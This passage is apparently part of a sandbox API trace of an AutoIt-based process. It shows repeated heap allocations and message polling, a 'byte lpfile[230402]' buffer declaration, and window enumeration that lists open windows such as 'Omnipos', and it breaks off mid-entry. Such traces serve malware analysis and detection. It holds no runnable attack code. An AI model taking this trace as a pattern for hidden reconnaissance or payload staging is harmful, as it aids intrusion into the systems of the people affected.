Size=0x8) returned 0x12efcf0 [0137.089] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe00 [0137.089] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316800 [0137.089] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0137.090] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.193] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.193] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe00 [0137.193] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0137.193] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13166c0 [0137.193] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e440 [0137.193] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.193] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.193] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe00 [0137.193] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0137.194] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0137.194] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e140 [0137.194] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.194] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.194] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe00 [0137.194] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0137.194] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13166c0 [0137.194] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e5c0 [0137.194] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.194] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.194] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe00 [0137.194] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0137.194] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0137.194] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0137.195] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.195] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.195] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0137.195] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0137.195] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316800 [0137.195] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e000 [0137.195] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.195] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.195] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd00 [0137.195] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efcf0 [0137.195] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316800 [0137.195] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e640 [0137.195] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.195] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.196] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe00 [0137.196] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0137.196] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0137.196] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e600 [0137.196] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.196] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.196] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0137.196] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe00 [0137.196] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316800 [0137.196] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.196] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.196] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.196] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.196] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.197] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.197] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.197] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.197] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.197] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.197] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.197] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.197] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.197] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.197] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.197] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.197] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.198] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.198] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.198] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.198] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.198] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.198] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.198] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.198] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.198] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.198] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.198] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.198] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.198] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.198] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.198] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.198] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.198] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.199] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.199] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.199] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.199] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.199] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.199] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.199] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.199] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.200] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.201] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.201] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.201] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.201] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.201] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.201] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.201] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.201] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.201] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.201] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.201] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.201] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.201] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.201] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.202] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.202] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.202] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0137.202] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.312] CharLowerBuffW (in: lpsz="byte lpfile[230402]", cchLength=0x13 | out: lpsz="byte lpfile[230402]") returned 0x13 [0139.316] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0139.316] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0139.316] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0139.316] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0139.317] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0139.317] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.317] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300220 [0139.317] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6e60 [0139.317] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0139.317] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6ec0 [0139.317] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0139.317] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6ec0 | out: hHeap=0x12c0000) returned 1 [0139.317] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e60 | out: hHeap=0x12c0000) returned 1 [0139.318] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300220 | out: hHeap=0x12c0000) returned 1 [0139.318] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.318] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0139.318] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0139.318] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0139.318] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fff78 [0139.318] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6e60 [0139.318] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0139.318] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6e78 [0139.318] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0139.318] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6e30 [0139.319] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe30 [0139.319] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6dd0 [0139.319] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efea0 [0139.319] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6e90 [0139.319] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd00 [0139.319] EnumWindows (lpEnumFunc=0xf7aed4, lParam=0xfe5500) returned 1 [0139.319] GetWindowTextW (in: hWnd=0x10128, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.319] GetClassNameW (in: hWnd=0x10128, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ForegroundStaging") returned 17 [0139.320] GetWindowTextW (in: hWnd=0x100f8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.320] GetClassNameW (in: hWnd=0x100f8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ForegroundStaging") returned 17 [0139.320] GetWindowTextW (in: hWnd=0x100ca, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.320] GetClassNameW (in: hWnd=0x100ca, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0139.320] GetWindowTextW (in: hWnd=0x100a4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.320] GetClassNameW (in: hWnd=0x100a4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0139.320] GetWindowTextW (in: hWnd=0x100a8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.321] GetClassNameW (in: hWnd=0x100a8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0139.321] GetWindowTextW (in: hWnd=0x100b4, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.321] GetClassNameW (in: hWnd=0x100b4, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0139.321] GetWindowTextW (in: hWnd=0x100be, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.321] GetClassNameW (in: hWnd=0x100be, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0139.322] GetWindowTextW (in: hWnd=0x100c2, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.322] GetClassNameW (in: hWnd=0x100c2, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0139.322] GetWindowTextW (in: hWnd=0x1008c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.322] GetClassNameW (in: hWnd=0x1008c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0139.322] GetWindowTextW (in: hWnd=0x10098, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.323] GetClassNameW (in: hWnd=0x10098, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0139.323] GetWindowTextW (in: hWnd=0x100bc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.323] GetClassNameW (in: hWnd=0x100bc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0139.323] GetWindowTextW (in: hWnd=0x10080, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.323] GetClassNameW (in: hWnd=0x10080, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Shell_TrayWnd") returned 13 [0139.324] GetWindowTextW (in: hWnd=0x20048, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Network Flyout") returned 14 [0139.324] GetClassNameW (in: hWnd=0x20048, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="ATL:00007FFB0FD84120") returned 20 [0139.324] GetWindowTextW (in: hWnd=0x100d6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.324] GetClassNameW (in: hWnd=0x100d6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0139.325] GetWindowTextW (in: hWnd=0x100cc, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.325] GetClassNameW (in: hWnd=0x100cc, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0139.325] GetWindowTextW (in: hWnd=0x802d6, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="AutoIt v3") returned 9 [0139.325] NtdllDefWindowProc_W (hWnd=0x802d6, Msg=0xd, wParam=0x400, lParam=0x7df1a8) returned 0x9 [0139.325] GetClassNameW (in: hWnd=0x802d6, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="AutoIt v3") returned 9 [0139.325] GetWindowTextW (in: hWnd=0x4035c, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.326] GetClassNameW (in: hWnd=0x4035c, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="URL Moniker Notification Window") returned 31 [0139.326] GetWindowTextW (in: hWnd=0x20286, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Blank Page - Internet Explorer") returned 30 [0139.326] GetClassNameW (in: hWnd=0x20286, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="TabThumbnailWindow") returned 18 [0139.327] GetWindowTextW (in: hWnd=0x202d8, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.327] GetClassNameW (in: hWnd=0x202d8, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="VSyncHelper-0062D168-9f59f66") returned 28 [0139.327] GetWindowTextW (in: hWnd=0x20364, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="") returned 0 [0139.327] GetClassNameW (in: hWnd=0x20364, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="Alternate Owner") returned 15 [0139.327] GetWindowTextW (in: hWnd=0x10336, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Omnipos") returned 7 [0139.328] GetClassNameW (in: hWnd=0x10336, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="omniposclass") returned 12 [0139.328] GetWindowTextW (in: hWnd=0x2021e, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Nor Development Rather") returned 22 [0139.328] GetClassNameW (in: hWnd=0x2021e, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="nordevelopmentRatherclass") 